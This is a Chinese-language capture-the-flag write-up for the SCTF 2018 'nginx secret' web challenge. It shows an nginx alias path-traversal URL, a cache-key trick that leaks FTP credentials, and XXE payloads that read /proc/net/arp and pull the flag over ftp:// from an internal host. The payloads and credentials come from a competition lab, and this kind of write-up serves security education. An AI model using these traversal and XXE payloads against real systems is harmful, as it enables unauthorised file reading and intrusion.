SCTF2018-nginx的秘密wp

NGINX的秘密

NGINX配置问题导致任意文件读取 /static../etc/nginx/nginx.conf，

user www-data;
worker_processes auto;
pid /run/nginx.pid;

events {
	worker_connections 768;
	# multi_accept on;
}

http {

	##
	# Basic Settings
	##

	sendfile on;
	tcp_nopush on;
	tcp_nodelay on;
	keepalive_timeout 65;
	types_hash_max_size 2048;
	# server_tokens off;

	# server_names_hash_bucket_size 64;
	# server_name_in_redirect off;

	include /etc/nginx/mime.types;
	default_type application/octet-stream;

	##
	# SSL Settings
	##

	ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
	ssl_prefer_server_ciphers on;

	##
	# Logging Settings
	##

	#access_log /var/log/nginx/access.log;
	#error_log /var/log/nginx/error.log;

	##
	# Gzip Settings
	##

	gzip on;
	gzip_disable "msie6";

	# gzip_vary on;
	# gzip_proxied any;
	# gzip_comp_level 6;
	# gzip_buffers 16 8k;
	# gzip_http_version 1.1;
	# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

	proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off;
	
	limit_conn_zone $binary_remote_addr zone=conn:10m;
	limit_req_zone  $binary_remote_addr zone=allips:10m rate=2r/s;

	
	server {
	    listen 4455 default_server;
	    server_name localhost;

	    location /static {
	        alias /home/;
	    }

	    location ~* \.(css|js|gif|png){
	        proxy_cache             my_cache;
	        proxy_cache_valid       200 30s;
	        proxy_pass              http://bugweb.app:8000;
	        proxy_set_header        Host $host:$server_port;
	        proxy_ignore_headers    Expires Cache-Control Set-Cookie;
	    }

	    location / {
	        limit_conn conn 10;
	        proxy_pass       http://bugweb.app:8000;
	        proxy_set_header Host $host:$server_port;
	    }
	}
	##
	# Virtual Host Configs
	##

	include /etc/nginx/conf.d/*.conf;
	include /etc/nginx/sites-enabled/*;
}


#mail {
#	# See sample authentication script at:
#	# http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# 
#	# auth_http localhost/auth.php;
#	# pop3_capabilities "TOP" "USER";
#	# imap_capabilities "IMAP4rev1" "UIDPLUS";
# 
#	server {
#		listen     localhost:110;
#		protocol   pop3;
#		proxy      on;
#	}
# 
#	server {
#		listen     localhost:143;
#		protocol   imap;
#		proxy      on;
#	}
#}

可以看到开启了缓存，会把css|js|gif|png这四种文件类型缓存。

查看文档http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path

由proxy_cache_path得知缓存文件保存在/tmp/mycache，用于定义缓存文件名的proxy_cache_key未设置，则使用默认值 $scheme$proxy_host$request_uri，即文件名形式为md5($scheme$proxy_host$request_uri),由于proxy_cache_path设置了levels=1:2，因此缓存文件存在/tmp/mycache下的两级目录下，第一级目录名取MD5值的最后一个字符，第二级目录名取MD5值的倒数2、3个字符.

又根据提示得知路由规则很奇怪：访问/editxxxxx等同于访问/edit，同理访问/write_plan/a.js等同于访问/write_plan.

因而构造http://149.129.103.103:4455/write_plan/a.js/ 提交给管理员访问

机器人挂了还得手动😂

得到路径为这里是个坑

不是md5(http://149.129.103.103:4455/write_plan/a.js/)

而是md5(http://bugweb.app:8000/write_plan/a.js/) == 6fcfa7b1e6bad837b70dc98c9b82b43b

所以应该访问路径为http://149.129.103.103:4455/static../tmp/mycache/b/43/6fcfa7b1e6bad837b70dc98c9b82b43b

可以看到ftp用户名与密码syc10ver Eec5TN9fruOOTp2G.

然后利用xxe执行arp命令

version

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE person [<!ENTITY remote SYSTEM
"file:///proc/net/arp">]>
<plans>
	<plan>
		<content>&remote;</content>
	</plan>
</plans>

得到3个ip

• a few seconds ago 172.19.0.1 0x1 0x2 02:42:ec:2a:71:fb * eth0
• a few seconds ago
• a few seconds ago 172.19.0.4 0x1 0x2 02:42:ac:13:00:04 * eth0
• a few seconds ago
• a few seconds ago 172.19.0.2 0x1 0x2 02:42:ac:13:00:02 * eth0

然后利用ftp读文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE person [<!ENTITY remote SYSTEM
"ftp://syc10ver:Eec5TN9fruOOTp2G@172.19.0.1/flag327a6c4304ad5938eaf0efb6cc3e53dc">]>
<plans>
	<plan>
		<content>payload &remote;</content>
	</plan>
</plans>

sctf{Not_0n1y_xx3_but_als0_web_cache}